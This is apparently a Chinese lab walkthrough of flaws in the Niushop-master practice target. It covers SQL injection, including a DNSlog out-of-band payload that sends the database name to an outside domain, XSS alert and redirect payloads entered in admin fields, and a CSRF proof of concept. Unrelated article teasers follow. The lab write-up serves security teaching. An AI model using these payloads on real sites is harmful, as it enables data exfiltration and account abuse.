Niushop-master靶场漏洞
靶场搭建
将 niushop-master.zip 压缩包放到网站的根目录,解压后访问
浏览器访问 install.php ,根据提示安装即可
1.SQL注入漏洞
随便选择一种商品分类,发现有参数,测试注入
测试闭合发现页面报错有sql注入
应该是环境的问题,但是这不影响我们判断存在sql注入
该网站还有一处sql注入漏洞,我们可以进入后台系统--设置--数据库管理--SQL执行与导入
输入查询语句,点击执行,成功执行,但是我们得不到具体信息,这时需要利用外带注入方法
外带原理:将dnslog平台中的特有字段payload带⼊⽬标发起dns请求,通过dns解析将请求后的关键信息组合新的三级域名带出,在dns服务器的dns⽇志中显示出来 DNSLog Platform
select load_file(concat('\\\\',(select database()),'.95xpzc.dnslog.cn\\abc'))文件上传漏洞
1.首先写一个一句话木马
XSS漏洞
反射型xss漏洞
登录后台系统--设置--基础设置--商城第三方统计代码
在输入框中输入js弹窗代码,然后点击提交
<script>alert(1)</script>返回前端页面,刷新,出现弹窗
后台系统还有一处反射型xss漏洞,点击网站--广告位--添加广告
<script>alert(1)</script>
返回前端刷新,点击该广告,页面会出现弹窗
存储型xss漏洞
后台系统还有一处,点击网站--广告位--添加广告
这里的 '链接地址' 可以尝试xss
在自己网站的根目录新建一个 2.html 文件,内容如下
<script>document.location="http://www.baidu.com"</script>
链接地址修改为www下的 2.html
返回前端,刷新页面,点击此广告,页面就会跳转到设置的界面
CSRF漏洞
注册一个普通用户,登录以后修改基本信息
使用bp抓取提交信息的请求包,鼠标右键--相关工具--生成CSRF-Poc--复制HTML
将复制的内容放到自己本地网站的根目录,浏览器访问
点击按钮,就会发现用户信息被修改,说明存在CSRF漏洞
支付漏洞
相关文章:
Niushop-master靶场漏洞
靶场搭建 将 niushop-master.zip 压缩包放到网站的根目录,解压后访问 浏览器访问 install.php ,根据提示安装即可 1.SQL注入漏洞 随便选择一种商品分类,发现有参数,测试注入 测试闭合发现页面报错有sql注入 应该是环境的问题&am…...
35道面向初中级前端的基础面试题
新鲜出炉的8月前端面试题 跨域资源共享 CORS 阮一峰 3. JSONP 是什么? 这是我认为写得比较通俗易懂的一篇文章jsonp原理详解——终于搞清楚jsonp是啥了。 4. 事件绑定的方式 嵌入dom 按钮 直接绑定 btn.onclick function(){} 事件监听 btn.addEventList…...
MFC用List Control 和Picture控件实现界面切换效果
添加List Control 和Picture控件 添加 3个子窗体 把子窗体边框设置为None, 样式设为Child 声明 CListCtrl m_listPageForm;void ShowForm(int nIndex);void CreatFormList();void CMFCApplication3Dlg::DoDataExchange(CDataExchange* pDX) {CDialogEx::DoDataExchange(pDX);DD…...
1. 解决前端vue项目 vite打包内存溢出问题
探索问题原因: 项目开发时正常运行不影响,打包出现上图错误,意味着打包过程中消耗了太多的内存导致的。 解决方法: 在 package.json中的打包命令替换如下: 解决前: "build:dev": "vite…...
Springboot高并发乐观锁
Spring Boot分布式锁的主要缺点包括但不限于以下几点: 性能开销:使用分布式锁通常涉及到网络通信,这会引入额外的延迟和性能开销。例如,当使用Redis或Zookeeper实现分布式锁时,每次获取或释放锁都需要与这些服务进行交…...
【WPS安装】WPS编译错误总结:WPS编译失败+仅编译成功ungrib等
WPS编译错误总结:WPS编译失败仅编译成功ungrib等 WPS编译过程问题1:WPS编译失败错误1:gfortran: error: unrecognized command-line option ‘-convert’; did you mean ‘-fconvert’?解决方案 问题2:WPS编译三个exe文件只出现u…...
的简单实现。)
pytorch MoE(专家混合网络)的简单实现。
专家混合(Mixture of Experts, MoE)是一种深度学习模型架构,通常用于处理大规模数据和复杂任务。它通过将输入分配给多个专家网络(即子模型),然后根据门控网络(gating network)的输出…...
虚拟机VMware的安装问题ip错误,虚拟网卡
要么没有虚拟网卡、有网卡远程连不上等 一般出现在win11 家庭版 1、是否IP错误 ip addr 2、 重置虚拟网卡 3、查看是否有虚拟网卡 4、如果以上检查都解决不了问题 如果你之前有vmware 后来卸载了,又重新安装,一般都会有问题 卸载重装vmware: 第一…...
Linux下基于最新稳定版ESP-IDF5.3.2开发esp32s3入门hello world输出【入门一】
开发环境搭建:Linux-Ubuntu下搭建ESP32的开发环境的步骤,使用乐鑫最新稳定版的esp-idf-CSDN博客 一、安装好开发环境后,在esp目录下再创建一个esp32的目录【用于编程测试demo】 二、进入esp32目录,打开终端【拷贝esp-idf的hello工…...
重温设计模式--命令模式
文章目录 命令模式的详细介绍C 代码示例C代码示例2 命令模式的详细介绍 定义与概念 命令模式属于行为型设计模式,它旨在将一个请求封装成一个对象,从而让你可以用不同的请求对客户端进行参数化,将请求的发送者和接收者解耦,并且能…...
电力通信规约-104实战
电力通信规约-104实战 概述 104规约在广泛应用于电力系统远动过程中,主要用来进行数据传输和转发,本文将结合实际开发实例来讲解104规约的真实使用情况。 实例讲解 因为个人技术栈是Java,所以本篇将采用Java实例来进行讲解。首先我们搭建一…...
什么是事务
在数据库管理系统中,事务(Transaction)是执行一系列操作的最小工作单元,这些操作要么全部成功,要么全部失败。为了确保数据的一致性和完整性,事务被设计为具备四大特性,即原子性(Ato…...
数据结构:双向循坏链表
目录 1.1双向循环链表的结构 2.双向链表功能的实现 2.1初始化链表 2.2销毁链表 2.3创建结点 2.4打印链表 2.5链表查找 2.6链表在pos的前面进行插入 2.7链表删除pos位置的节点 2.8链表的头插,头删 ,尾插,尾删 1.1双向循环链表的结构 …...
3.1、SDH的5种标准容器
1、定义与作用 在 SDH(同步数字体系)中,标准容器(C)是一种用来装载各种速率的 PDH(准同步数字系列)信号的信息结构。它的主要作用是进行速率适配,使不同速率的 PDH 信号能够在 SDH 的…...
Jenkins介绍
Jenkins 是一款流行的开源自动化服务器,在软件开发和持续集成 / 持续交付(CI/CD)流程中发挥着关键作用。 一、主要功能 1.持续集成(CI) (1).自动构建:Jenkins 可以配置为监听代码仓…...
5G学习笔记之Non-Public Network
目录 0. NPN系列 1. 概述 2. SNPN 2.1 SNPN概述 2.2 SNPN架构 2.3 SNPN部署 2.3.1 完全独立 2.3.2 共享PLMN基站 2.3.3 共享PLMN基站和PLMN频谱 3. PNI-NPN 3.1 PNI-NPN概述 3.2 PNI-NPN部署 3.2.1 UPF独立 3.2.2 完全共享 0. NPN系列 1. NPN概述 2. NPN R18 3. 【SNPN系列】S…...
网页生成鸿蒙App
如何网页生成鸿蒙App 纯鸿蒙发布后,鸿蒙App需求上升。如何快速生成鸿蒙App。变色龙云(http://www.appbsl.cn)推出了鸿蒙App打包服务。可以在线自动打包鸿蒙App。 第一步 创建应用 输入网站网址,上传图标。 第二步 生成鸿蒙证书 打开华为开发者管理中…...
JavaWeb通过Web查询数据库内容:(pfour_webquerymysql)
JavaWeb通过Web查询数据库内容: 数据库: 自行建库建表,主键 id 后端: 新建项目模块选择模块,添加依赖创建配置文件: db.propertiesJava类: query查询 前端: Web添加创建query.html…...
将java项目部署到linux
命令解析 Dockerfile: Dockerfile 是一个文本文件,包含了所有必要的指令来组装(build)一个 Docker 镜像。 docker build: 根据 Dockerfile 或标准指令来构建一个新的镜像。 docker save: 将本地镜像保存为一个 tar 文件。 docker load: 从…...
moviepy将图片序列制作成视频并加载字幕 - python 实现
DataBall 助力快速掌握数据集的信息和使用方式,会员享有 百种数据集,持续增加中。 需要更多数据资源和技术解决方案,知识星球: “DataBall - X 数据球(free)” -------------------------------------------------------------…...
缺口大!平均月薪超2万元!这个岗位超级火!
当下最火的是什么?答案毫无悬念,一定是人工智能。如今,人工智能行业正以肉眼可见的速度迅速崛起,市场对相关专业人才的需求也随之越来越大。1.市场人才缺口大前几天,人民日报、央视财经等多个主流媒体发布文章…...
JBoltAI企业级Agent平台,重构业务服务新范式
随着AI技术从内容生成走向服务重塑,企业智能化建设已进入Agent驱动的新阶段。JBoltAI立足Java原生企业级架构,以AIGS(人工智能生成服务)为核心范式,面向企业复杂业务场景,正式构建企业级Agent平台ÿ…...
OpenClaw学习助手:百川2-13B驱动的自动化笔记整理系统
OpenClaw学习助手:百川2-13B驱动的自动化笔记整理系统 1. 为什么需要自动化笔记整理 作为一个经常需要阅读大量技术文档和论文的开发者,我发现自己陷入了一个困境:每次下载新的PDF或PPT文件后,要么没时间仔细阅读,要…...
FormCreate事件监听全攻略:从‘change’到‘control’,让你的表单真正‘活’起来
FormCreate事件监听全攻略:从‘change’到‘control’,让你的表单真正‘活’起来 表单开发从来不只是静态字段的堆砌。当你的用户需要根据前一个选择动态调整后续选项,当表单提交前需要实时校验多个字段的关联性,当字段间的显示逻…...
3个维度解析Outfit字体:构建跨平台设计系统的开源解决方案
3个维度解析Outfit字体:构建跨平台设计系统的开源解决方案 【免费下载链接】Outfit-Fonts The most on-brand typeface 项目地址: https://gitcode.com/gh_mirrors/ou/Outfit-Fonts 在数字化设计领域,字体作为视觉传达的核心元素,直接…...
)
新手上路:用Realsense Viewer和Rviz快速验证你的Intel L515相机(从插上USB3.0到看到点云)
新手上路:用Realsense Viewer和Rviz快速验证你的Intel L515相机 刚拿到Intel RealSense L515激光雷达相机时,最迫切的需求往往是快速确认设备能否正常工作。本文将带你跳过复杂的配置流程,直接进入**"插电即用"**的验证阶段。无论你…...
三电平 VSG 构网型变流器仿真分析
三电平 VSG 构网型变流器仿真 仿真使用双闭环控制,svpwm 调制 [1]包含 LC 滤波器 [2]包含中点电位平衡控制 [3]包含负荷投切与离网切换 基本工况:0—3s 功率指令 170kw3-6s 功率指令 140kw电网频率在 1-2s 暂降 0.2hz,vsg 通过 增发有功维持…...
)
从71.5%到87.5%:我是如何用PyTorch+ResNeXt101优化GTZAN音乐分类精度的(附完整代码)
从71.5%到87.5%:PyTorch音乐分类模型优化实战全解析 音乐分类任务一直是音频处理领域的热门研究方向。在GTZAN数据集上,我们经常会遇到基础模型表现不佳的问题——比如使用ResNet18时验证集准确率仅能达到71.5%。本文将详细分享如何通过一系列优化策略&a…...
Blender 3D创作套件:5大核心技术解析与完全指南
Blender 3D创作套件:5大核心技术解析与完全指南 【免费下载链接】blender Official mirror of Blender 项目地址: https://gitcode.com/gh_mirrors/bl/blender Blender作为一款免费开源的3D创作套件,为艺术家、设计师和开发者提供了从建模、动画到…...
Fasd 终极指南:Mozilla 启发的智能命令行加速神器
Fasd 终极指南:Mozilla 启发的智能命令行加速神器 【免费下载链接】fasd Command-line productivity booster, offers quick access to files and directories, inspired by autojump, z and v. 项目地址: https://gitcode.com/gh_mirrors/fa/fasd Fasd 是一…...